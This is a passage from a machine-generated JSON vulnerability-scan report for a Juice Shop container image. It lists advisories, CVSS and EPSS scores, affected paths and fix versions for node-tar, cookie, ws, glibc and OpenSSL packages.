(semantic)"},"fix":{"suggestedVersion":"7.5.3"}}],"artifact":{"id":"pkg:npm/tar@4.4.19?package-id=f42c59d94c10b95d","name":"tar","version":"4.4.19","type":"npm","locations":[{"path":"/juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["ISC"],"cpes":["cpe:2.3:a:tar_project:tar:4.4.19:*:*:*:*:node.js:*:*","cpe:2.3:a:isaacs:tar:4.4.19:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/tar@4.4.19","upstreams":[]}},{"vulnerability":{"id":"GHSA-8qq5-rm4j-mr97","dataSource":"https://github.com/advisories/GHSA-8qq5-rm4j-mr97","namespace":"github:language:javascript","severity":"High","urls":["https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97","https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e","https://nvd.nist.gov/vuln/detail/CVE-2026-23745"],"description":"node-tar is Vulnerable to Arbitrary File Overwrite and Symlink Poisoning via Insufficient Path Sanitization","cvss":[{"type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N","metrics":{"baseScore":8.2},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-23745","epss":0.00308,"percentile":0.22263,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-23745","cwe":"CWE-22","source":"security-advisories@github.com","type":"Primary"}],"fix":{"versions":["7.5.3"],"state":"fixed","available":[{"version":"7.5.3","date":"2026-01-17","kind":"first-observed"}]},"advisories":[],"risk":0.24177999999999994},"relatedVulnerabilities":[{"id":"CVE-2026-23745","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-23745","namespace":"nvd:cpe","severity":"Medium","urls":["https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e","https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97"],"description":"node-tar is a Tar for Node.js. The node-tar library (<= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets. This vulnerability is fixed in 7.5.3.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N","metrics":{"baseScore":6.1,"exploitabilityScore":1.9,"impactScore":4.3},"vendorMetadata":{}},{"source":"security-advisories@github.com","type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","metrics":{"baseScore":8.2},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-23745","epss":0.00308,"percentile":0.22263,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-23745","cwe":"CWE-22","source":"security-advisories@github.com","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"tar","version":"6.2.1"}},"found":{"vulnerabilityID":"GHSA-8qq5-rm4j-mr97","versionConstraint":"<=7.5.2 (semantic)"},"fix":{"suggestedVersion":"7.5.3"}}],"artifact":{"id":"pkg:npm/tar@6.2.1?package-id=09de397807f7641f","name":"tar","version":"6.2.1","type":"npm","locations":[{"path":"/juice-shop/node_modules/sqlite3/node_modules/tar/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["ISC"],"cpes":["cpe:2.3:a:tar_project:tar:6.2.1:*:*:*:*:node.js:*:*","cpe:2.3:a:isaacs:tar:6.2.1:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/tar@6.2.1","upstreams":[]}},{"vulnerability":{"id":"GHSA-pxg6-pf52-xh8x","dataSource":"https://github.com/advisories/GHSA-pxg6-pf52-xh8x","namespace":"github:language:javascript","severity":"Low","urls":["https://github.com/jshttp/cookie/security/advisories/GHSA-pxg6-pf52-xh8x","https://github.com/jshttp/cookie/pull/167","https://github.com/jshttp/cookie/commit/e10042845354fea83bd8f34af72475eed1dadf5c"],"description":"cookie accepts cookie name, path, and domain with out of bounds characters","cvss":[],"epss":[{"cve":"CVE-2024-47764","epss":0.00749,"percentile":0.4998,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2024-47764","cwe":"CWE-74","source":"security-advisories@github.com","type":"Secondary"}],"fix":{"versions":["0.7.0"],"state":"fixed","available":[{"version":"0.7.0","date":"2024-10-05","kind":"first-observed"}]},"advisories":[],"risk":0.22469999999999998},"relatedVulnerabilities":[{"id":"CVE-2024-47764","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2024-47764","namespace":"nvd:cpe","severity":"Medium","urls":["https://github.com/jshttp/cookie/commit/e10042845354fea83bd8f34af72475eed1dadf5c","https://github.com/jshttp/cookie/pull/167","https://github.com/jshttp/cookie/security/advisories/GHSA-pxg6-pf52-xh8x"],"description":"cookie is a basic HTTP cookie parser and serializer for HTTP servers. The cookie name could be used to set other fields of the cookie, resulting in an unexpected cookie value. A similar escape can be used for path and domain, which could be abused to alter other fields of the cookie. Upgrade to 0.7.0, which updates the validation for name, path, and domain.","cvss":[{"source":"security-advisories@github.com","type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","metrics":{"baseScore":6.9},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2024-47764","epss":0.00749,"percentile":0.4998,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2024-47764","cwe":"CWE-74","source":"security-advisories@github.com","type":"Secondary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"cookie","version":"0.4.2"}},"found":{"vulnerabilityID":"GHSA-pxg6-pf52-xh8x","versionConstraint":"<0.7.0 (semantic)"},"fix":{"suggestedVersion":"0.7.0"}}],"artifact":{"id":"pkg:npm/cookie@0.4.2?package-id=299182936c2fe78a","name":"cookie","version":"0.4.2","type":"npm","locations":[{"path":"/juice-shop/node_modules/engine.io/node_modules/cookie/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:cookie:cookie:0.4.2:*:*:*:*:*:*:*"],"purl":"pkg:npm/cookie@0.4.2","upstreams":[]}},{"vulnerability":{"id":"GHSA-58qx-3vcg-4xpx","dataSource":"https://github.com/advisories/GHSA-58qx-3vcg-4xpx","namespace":"github:language:javascript","severity":"Medium","urls":["https://github.com/websockets/ws/security/advisories/GHSA-58qx-3vcg-4xpx","https://nvd.nist.gov/vuln/detail/CVE-2026-45736","https://github.com/websockets/ws/commit/c0327ec15a54d701eb6ccefaa8bef328cfc03086"],"description":"ws: Uninitialized memory disclosure","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N","metrics":{"baseScore":4.4,"exploitabilityScore":0.8,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-45736","epss":0.00473,"percentile":0.371,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-45736","cwe":"CWE-908","source":"security-advisories@github.com","type":"Secondary"}],"fix":{"versions":["8.20.1"],"state":"fixed","available":[{"version":"8.20.1","date":"2026-05-19","kind":"first-observed"}]},"advisories":[],"risk":0.22231},"relatedVulnerabilities":[{"id":"CVE-2026-45736","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-45736","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/websockets/ws/commit/c0327ec15a54d701eb6ccefaa8bef328cfc03086","https://github.com/websockets/ws/security/advisories/GHSA-58qx-3vcg-4xpx"],"description":"ws is an open source WebSocket client and server for Node.js. Prior to 8.20.1, the websocket.close() implementation is vulnerable to uninitialized memory disclosure when a TypedArray is passed as the reason argument. This vulnerability is fixed in 8.20.1.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}},{"source":"security-advisories@github.com","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N","metrics":{"baseScore":4.4,"exploitabilityScore":0.8,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-45736","epss":0.00473,"percentile":0.371,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-45736","cwe":"CWE-908","source":"security-advisories@github.com","type":"Secondary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"ws","version":"8.17.1"}},"found":{"vulnerabilityID":"GHSA-58qx-3vcg-4xpx","versionConstraint":">=8.0.0,<8.20.1 (semantic)"},"fix":{"suggestedVersion":"8.20.1"}}],"artifact":{"id":"pkg:npm/ws@8.17.1?package-id=c740f277708480a9","name":"ws","version":"8.17.1","type":"npm","locations":[{"path":"/juice-shop/node_modules/ws/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:ws_project:ws:8.17.1:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/ws@8.17.1","upstreams":[]}},{"vulnerability":{"id":"CVE-2026-4437","dataSource":"https://security-tracker.debian.org/tracker/CVE-2026-4437","namespace":"debian:distro:debian:13","severity":"High","urls":[],"description":"Calling gethostbyaddr or gethostbyaddr_r with a configured nsswitch.conf that specifies the library's DNS backend in the GNU C Library version 2.34 to version 2.43 could, with a crafted response from the configured DNS server, result in a violation of the DNS specification that causes the application to treat a non-answer section of the DNS response as a valid answer.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-4437","epss":0.00292,"percentile":0.20716,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-4437","cwe":"CWE-125","source":"3ff69d7a-14f2-4f67-a097-88dee7810d18","type":"Secondary"}],"fix":{"versions":["2.41-12+deb13u3"],"state":"fixed","available":[{"version":"2.41-12+deb13u3","date":"2026-05-17","kind":"first-observed"}]},"advisories":[],"risk":0.219},"relatedVulnerabilities":[{"id":"CVE-2026-4437","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-4437","namespace":"nvd:cpe","severity":"High","urls":["https://sourceware.org/bugzilla/show_bug.cgi?id=34014"],"description":"Calling gethostbyaddr or gethostbyaddr_r with a configured nsswitch.conf that specifies the library's DNS backend in the GNU C Library version 2.34 to version 2.43 could, with a crafted response from the configured DNS server, result in a violation of the DNS specification that causes the application to treat a non-answer section of the DNS response as a valid answer.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-4437","epss":0.00292,"percentile":0.20716,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-4437","cwe":"CWE-125","source":"3ff69d7a-14f2-4f67-a097-88dee7810d18","type":"Secondary"}]}],"matchDetails":[{"type":"exact-indirect-match","matcher":"dpkg-matcher","searchedBy":{"distro":{"type":"debian","version":"13"},"package":{"name":"glibc","version":"2.41-12+deb13u2"},"namespace":"debian:distro:debian:13"},"found":{"vulnerabilityID":"CVE-2026-4437","versionConstraint":"< 2.41-12+deb13u3 (deb)"},"fix":{"suggestedVersion":"2.41-12+deb13u3"}}],"artifact":{"id":"pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64&distro=debian-13&package-id=089516409246f602&upstream=glibc","name":"libc6","version":"2.41-12+deb13u2","type":"deb","locations":[{"path":"/usr/share/doc/libc6/copyright","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""},{"path":"/var/lib/dpkg/status.d/libc6","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""},{"path":"/var/lib/dpkg/status.d/libc6.md5sums","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""}],"language":"","licenses":["BSD-2-Clause","BSD-3-clause-Berkeley","BSD-3-clause-Carnegie","BSD-3-clause-Oracle","BSD-3-clause-WIDE","BSD-like-Spencer","BSL-1.0","CORE-MATH","Carnegie","DEC","FSFAP","GPL-2+-with-link-exception","GPL-2.0-only","GPL-2.0-or-later","GPL-3.0-only","GPL-3.0-or-later","IBM","ISC","Inner-Net","LGPL-2.0-only","LGPL-2.0-or-later","LGPL-2.1+-with-link-exception","LGPL-2.1-only","LGPL-2.1-or-later","LGPL-3.0-only","LGPL-3.0-or-later","MIT-like-Lord","PCRE","SunPro","Unicode-DFS-2016","Univ-Coimbra","public-domain"],"cpes":["cpe:2.3:a:libc6:libc6:2.41-12\\+deb13u2:*:*:*:*:*:*:*"],"purl":"pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64&distro=debian-13&upstream=glibc","upstreams":[{"name":"glibc"}]}},{"vulnerability":{"id":"CVE-2026-9076","dataSource":"https://security-tracker.debian.org/tracker/CVE-2026-9076","namespace":"debian:distro:debian:13","severity":"High","urls":[],"description":"Issue summary: When CMS password-based decryption (RFC 3211 / PWRI key unwrap) processes attacker-supplied CMS data, an attacker-chosen stream-mode KEK cipher can trigger a heap out-of-bounds read in kek_unwrap_key(). Impact summary: A heap buffer over-read may trigger a crash which leads to Denial of Service for an application if the input buffer ends at a memory page boundary and the following page is unmapped. There is no information disclosure as the over-read bytes are not revealed to the attacker. The key unwrapping function performs a check-byte test as specified in the RFC that reads 7 bytes from a heap allocation that is based on the wrapped key length from the message. There is a minimum length check based on the block length of the wrapping cipher. However the cipher is selected from an OID carried in the attacker's PWRI keyEncryptionAlgorithm with no requirement that the cipher be a block cipher. When an attacker selects a stream-mode cipher the guard will be ineffective and the allocated buffer containing the unwrapped key can be too small to fit the check-bytes specified in the RFC and a buffer over-read can happen. Applications calling CMS_decrypt() or CMS_decrypt_set1_password() (equivalently openssl cms -decrypt -pwri_password ...) on untrusted CMS data are vulnerable to this issue. No password knowledge is required: the over-read happens during the unwrap attempt before any authentication succeeds. The over-read is limited to a few bytes and is not written to output, so there is no information disclosure. Triggering a crash requires the allocation to border unmapped memory, which is unlikely with the normal allocator. The FIPS modules are not affected by this issue.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-9076","epss":0.00292,"percentile":0.20699,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-9076","cwe":"CWE-125","source":"openssl-security@openssl.org","type":"Secondary"}],"fix":{"versions":["3.5.6-1~deb13u2"],"state":"fixed","available":[{"version":"3.5.6-1~deb13u2","date":"2026-06-09","kind":"advisory"}]},"advisories":[{"id":"DSA-6335-1","link":"https://security-tracker.debian.org/tracker/DSA-6335-1"}],"risk":0.219},"relatedVulnerabilities":[{"id":"CVE-2026-9076","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-9076","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/openssl/openssl/commit/05b066366842f930fadd9a6e94df98030af431bb","https://github.com/openssl/openssl/commit/3d8d5bc1056b2f62da9fede23fedbf47e85187b0","https://github.com/openssl/openssl/commit/715349a1d7c6db970e6815dafb90915f07307f98","https://github.com/openssl/openssl/commit/77bf00ab13f6ff5e516535432f0328ed70ec0c26","https://github.com/openssl/openssl/commit/eecbe330977e8d023aae1ca2d9bdbe983ef3fdc6","https://openssl-library.org/news/secadv/20260609.txt"],"description":"Issue summary: When CMS password-based decryption (RFC 3211 / PWRI key unwrap)\nprocesses attacker-supplied CMS data, an attacker-chosen stream-mode KEK\ncipher can trigger a heap out-of-bounds read in kek_unwrap_key().\n\nImpact summary: A heap buffer over-read may trigger a crash which leads to\nDenial of Service for an application if the input buffer ends at a memory\npage boundary and the following page is unmapped. There is no information\ndisclosure as the over-read bytes are not revealed to the attacker.\n\nThe key unwrapping function performs a check-byte test as specified in the\nRFC that reads 7 bytes from a heap allocation that is based on the wrapped\nkey length from the message. There is a minimum length check based on the\nblock length of the wrapping cipher. However the cipher is selected from\nan OID carried in the attacker's PWRI keyEncryptionAlgorithm with no\nrequirement that the cipher be a block cipher. When an attacker selects\na stream-mode cipher the guard will be ineffective and the allocated buffer\ncontaining the unwrapped key can be too small to fit the check-bytes\nspecified in the RFC and a buffer over-read can happen.\n\nApplications calling CMS_decrypt() or CMS_decrypt_set1_password()\n(equivalently openssl cms -decrypt -pwri_password ...) on untrusted CMS\ndata are vulnerable to this issue. No password knowledge is required: the\nover-read happens during the unwrap attempt before any authentication\nsucceeds.\n\nThe over-read is limited to a few bytes and is not written to output, so\nthere is no information disclosure. Triggering a crash requires the\nallocation to border unmapped memory, which is unlikely with the normal\nallocator.\n\nThe FIPS modules are not affected by this issue.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-9076","epss":0.00292,"percentile":0.20699,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-9076","cwe":"CWE-125","source":"openssl-security@openssl.org","type":"Secondary"}]}],"matchDetails":[{"type":"exact-indirect-match","matcher":"dpkg-matcher","searchedBy":{"distro":{"type":"debian","version":"13"},"package":{"name":"openssl","version":"3.5.5-1~deb13u2"},"namespace":"debian:distro:debian:13"},"found":{"vulnerabilityID":"CVE-2026-9076","versionConstraint":"< 3.5.6-1~deb13u2 (deb)"},"fix":{"suggestedVersion":"3.5.6-1~deb13u2"}}],"artifact":{"id":"pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64&distro=debian-13&package-id=d839547e5a6a801d&upstream=openssl","name":"libssl3t64","version":"3.5.5-1~deb13u2","type":"deb","locations":[{"path":"/usr/share/doc/libssl3t64/copyright","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""},{"path":"/var/lib/dpkg/status.d/libssl3t64","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""},{"path":"/var/lib/dpkg/status.d/libssl3t64.md5sums","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""}],"language":"","licenses":["Apache-2.0","Artistic","GPL-1.0-only","GPL-1.0-or-later"],"cpes":["cpe:2.3:a:libssl3t64:libssl3t64:3.5.5-1\\~deb13u2:*:*:*:*:*:*:*"],"purl":"pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64&distro=debian-13&upstream=openssl","upstreams":[{"name":"openssl"}]}},{"vulnerability":{"id":"GHSA-qffp-2rhf-9h96","dataSource":"https://github.com/advisories/GHSA-qffp-2rhf-9h96","namespace":"github:language:javascript","severity":"High","urls":["https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96","https://github.com/isaacs/node-tar/commit/7bc755dd85e623c0279e08eb3784909e6d7e4b9f","https://nvd.nist.gov/vuln/detail/CVE-2026-29786"],"description":"tar has Hardlink Path Traversal via Drive-Relative Linkpath","cvss":[{"type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L","metrics":{"baseScore":8.2},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-29786","epss":0.00276,"percentile":0.19085,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-29786","cwe":"CWE-22","source":"security-advisories@github.com","type":"Primary"},{"cve":"CVE-2026-29786","cwe":"CWE-59","source":"security-advisories@github.com","type":"Primary"},{"cve":"CVE-2026-29786","cwe":"CWE-22","source":"nvd@nist.gov","type":"Primary"}],"fix":{"versions":["7.5.10"],"state":"fixed","available":[{"version":"7.5.10","date":"2026-03-05","kind":"first-observed"}]},"advisories":[],"risk":0.21666},"relatedVulnerabilities":[{"id":"CVE-2026-29786","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-29786","namespace":"nvd:cpe","severity":"Medium","urls":["https://github.com/isaacs/node-tar/commit/7bc755dd85e623c0279e08eb3784909e6d7e4b9f","https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96"],"description":"node-tar is a full-featured Tar for Node.js. Prior to version 7.5.10, tar can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as C:../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This issue has been patched in version 7.5.10.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N","metrics":{"baseScore":6.3,"exploitabilityScore":1.9,"impactScore":4},"vendorMetadata":{}},{"source":"security-advisories@github.com","type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","metrics":{"baseScore":8.2},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-29786","epss":0.00276,"percentile":0.19085,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-29786","cwe":"CWE-22","source":"security-advisories@github.com","type":"Primary"},{"cve":"CVE-2026-29786","cwe":"CWE-59","source":"security-advisories@github.com","type":"Primary"},{"cve":"CVE-2026-29786","cwe":"CWE-22","source":"nvd@nist.gov","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"tar","version":"4.4.19"}},"found":{"vulnerabilityID":"GHSA-qffp-2rhf-9h96","versionConstraint":"<=7.5.9 (semantic)"},"fix":{"suggestedVersion":"7.5.10"}}],"artifact":{"id":"pkg:npm/tar@4.4.19?package-id=f42c59d94c10b95d","name":"tar","version":"4.4.19","type":"npm","locations":[{"path":"/juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["ISC"],"cpes":["cpe:2.3:a:tar_project:tar:4.4.19:*:*:*:*:node.js:*:*","cpe:2.3:a:isaacs:tar:4.4.19:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/tar@4.4.19","upstreams":[]}},{"vulnerability":{"id":"GHSA-qffp-2rhf-9h96","dataSource":"https://github.com/advisories/GHSA-qffp-2rhf-9h96","namespace":"github:language:javascript","severity":"High","urls":["https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96","https://github.com/isaacs/node-tar/commit/7bc755dd85e623c0279e08eb3784909e6d7e4b9f","https://nvd.nist.gov/vuln/detail/CVE-2026-29786"],"description":"tar has Hardlink Path Traversal via Drive-Relative Linkpath","cvss":[{"type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L","metrics":{"baseScore":8.2},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-29786","epss":0.00276,"percentile":0.19085,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-29786","cwe":"CWE-22","source":"security-advisories@github.com","type":"Primary"},{"cve":"CVE-2026-29786","cwe":"CWE-59","source":"security-advisories@github.com","type":"Primary"},{"cve":"CVE-2026-29786","cwe":"CWE-22","source":"nvd@nist.gov","type":"Primary"}],"fix":{"versions":["7.5.10"],"state":"fixed","available":[{"version":"7.5.10","date":"2026-03-05","kind":"first-observed"}]},"advisories":[],"risk":0.21666},"relatedVulnerabilities":[{"id":"CVE-2026-29786","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-29786","namespace":"nvd:cpe","severity":"Medium","urls":["https://github.com/isaacs/node-tar/commit/7bc755dd85e623c0279e08eb3784909e6d7e4b9f","https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96"],"description":"node-tar is a full-featured Tar for Node.js. Prior to version 7.5.10, tar can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as C:../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This issue has been patched in version 7.5.10.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N","metrics":{"baseScore":6.3,"exploitabilityScore":1.9,"impactScore":4},"vendorMetadata":{}},{"source":"security-advisories@github.com","type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","metrics":{"baseScore":8.2},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-29786","epss":0.00276,"percentile":0.19085,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-29786","cwe":"CWE-22","source":"security-advisories@github.com","type":"Primary"},{"cve":"CVE-2026-29786","cwe":"CWE-59","source":"security-advisories@github.com","type":"Primary"},{"cve":"CVE-2026-29786","cwe":"CWE-22","source":"nvd@nist.gov","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"tar","version":"6.2.1"}},"found":{"vulnerabilityID":"GHSA-qffp-2rhf-9h96","versionConstraint":"<=7.5.9 (semantic)"},"fix":{"suggestedVersion":"7.5.10"}}],"artifact":{"id":"pkg:npm/tar@6.2.1?package-id=09de397807f7641f","name":"tar","version":"6.2.1","type":"npm","locations":[{"path":"/juice-shop/node_modules/sqlite3/node_modules/tar/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["ISC"],"cpes":["cpe:2.3:a:tar_project:tar:6.2.1:*:*:*:*:node.js:*:*","cpe:2.3:a:isaacs:tar:6.2.1:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/tar@6.2.1","upstreams":[]}},{"vulnerability":{"id":"GHSA-83g3-92jg-28cx","dataSource":"https://github.com/advisories/GHSA-83g3-92jg-28cx","namespace":"github:language:javascript","severity":"High","urls":["https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx","https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384","https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f","https://nvd.nist.gov/vuln/detail/CVE-2026-26960"],"description":"Arbitrary File Read/Write via Hardlink Target Escape Through Symlink Chain in node-tar 